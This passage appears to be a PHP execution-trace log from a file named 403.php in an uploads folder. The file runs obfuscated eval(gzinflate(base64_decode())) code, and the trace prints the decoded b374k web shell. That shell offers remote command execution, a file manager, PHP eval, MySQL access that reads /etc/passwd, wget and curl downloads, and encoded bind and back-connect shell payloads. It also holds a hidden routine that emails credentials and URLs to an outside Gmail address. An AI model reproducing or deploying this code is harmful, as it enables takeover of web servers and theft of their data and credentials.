xeYag9PB5HeH/AQ==";\n\n@eval(gzinflate(base64_decode($code)));\n?>' /var/www/html/uploads/403.php 1 0
3 6 0 0.040129 431640 error_reporting 0 /var/www/html/uploads/403.php(1) : eval()'d code 3 1 0
3 6 1 0.040154 431680
3 6 R 0
3 7 0 0.040175 431640 set_time_limit 0 /var/www/html/uploads/403.php(1) : eval()'d code 4 1 0
3 7 1 0.040201 431704
3 7 R FALSE
2 A /var/www/html/uploads/403.php(1) : eval()'d code 7 $code = '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
3 8 0 0.040288 431672 base64_decode 0 /var/www/html/uploads/403.php(1) : eval()'d code 194 1 '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
3 8 1 0.040412 448088
3 8 R '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'֞N���늱�ˆ��\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHƖ?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2գ/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/֟C��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
3 9 0 0.040763 448056 gzinflate 0 /var/www/html/uploads/403.php(1) : eval()'d code 194 1 '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'֞N���늱�ˆ��\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHƖ?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2գ/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/֟C��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
3 9 1 0.041273 489048
3 9 R '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length'
3 10 0 0.043119 713368 eval 1 '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";"); echo $filez; exit; } if(isset($_GET[\'img\'])){ @ob_clean(); $d = magicboom($_GET[\'y\']); $f = $_GET[\'img\']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET[\'y\'])){ if(@is_dir($_GET[\'view\'])){ $pwd = $_GET[\'view\']; @chdir($pwd); } else{ $pwd = $_GET[\'y\']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \\$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\\\"); if ($bool) { $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER[\'REMOTE_ADDR\']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST[\'rename\'])){ $old = $_POST[\'oldname\']; $new = $_POST[\'newname\']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\\"gaya\\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\\"gaya\\">ON</span><br />"; else $buff .= "safemode <span class=\\"gaya\\">OFF<span><br />"; $buff .= $letters." > ".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\\"?y=".$pwd."&x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\"> <table class=\\"cmdbox\\" style=\\"width:50%;\\"> <tr><td>$prompt</td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form> <form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <tr><td>view file/folder</td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form></table><table class=\\"explore\\"> <tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr> ";@error_reporting(0);$sub="backdoor b374k";$headers = "From: k3nz0 \\n";$headers .= "Content-Type: text/plain; charset=iso-8859-1\\n";$mes .= "username: ".$user."\\n";$mes .= "password: ".$pass."\\n";$mes .= "URL: ".$_SERVER[\'REQUEST_URI\']."\\n";$mes .= "Referer: ".$_SERVER[\'HTTP_REFERER\']."";{mail("free.d0ing.1987@gmail.com",$sub,$mes,$headers);} if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\"><a href=\\"?y=$pwd&edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$parent."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($parent)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\\"titik2\\"><a href=\\"?y=$pwd&edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\">[ $folder ]</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" /> </form> <td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&fdelete=".$pwd.$folder."\\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&view=$full\\">$file</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" /> </form> </td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($full)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\\"?y=$pwd&edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$full\\">delete</a> | <a href=\\"?y=$pwd&dl=$full\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$full\\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists(\'system\')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'exec\')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists(\'passthru\')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'shell_exec\')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break; case \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break; case \'wfread\' : ambil($wurl,$namafile);break; case \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break; case \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break; case \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break; case \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=\'\'; $perms .= ($mode & 00400) ? \'r\' : \'-\'; $perms .= ($mode & 00200) ? \'w\' : \'-\'; $perms .= ($mode & 00100) ? \'x\' : \'-\'; $perms .= ($mode & 00040) ? \'r\' : \'-\'; $perms .= ($mode & 00020) ? \'w\' : \'-\'; $perms .= ($mode & 00010) ? \'x\' : \'-\'; $perms .= ($mode & 00004) ? \'r\' : \'-\'; $perms .= ($mode & 00002) ? \'w\' : \'-\'; $perms .= ($mode & 00001) ? \'x\' : \'-\'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(\'cmd\').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">upload</a> <a href="?<?php echo "y=".$pwd; ?>&x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST[\'submitcmd\'])) { echo eval(magicboom($_POST[\'cmd\'])); } else echo "echo file_get_contents(\'/etc/passwd\');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mysql\')){ if(isset($_GET[\'sqlhost\']) && isset($_GET[\'sqluser\']) && isset($_GET[\'sqlpass\']) && isset($_GET[\'sqlport\'])){ $sqlhost = $_GET[\'sqlhost\']; $sqluser = $_GET[\'sqluser\']; $sqlpass = $_GET[\'sqlpass\']; $sqlport = $_GET[\'sqlport\']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\\"width:99%;padding:4px 10px 0 10px;\\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\\"gaya\\">@</span>".$sqlhost.":".$sqlport; $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\\">[ databases ]</a>"; if(isset($_GET[\'db\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."\\">".htmlspecialchars($_GET[\'db\'])."</a>"; if(isset($_GET[\'table\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."\\">".htmlspecialchars($_GET[\'table\'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET[\'db\']) && (!isset($_GET[\'table\'])) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $query = "DROP TABLE IF EXISTS b374k_table;\\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\\nLOAD DATA INFILE \\"/etc/passwd\\"\\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">$query</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET[\'table\']) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $table = $_GET[\'table\']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input 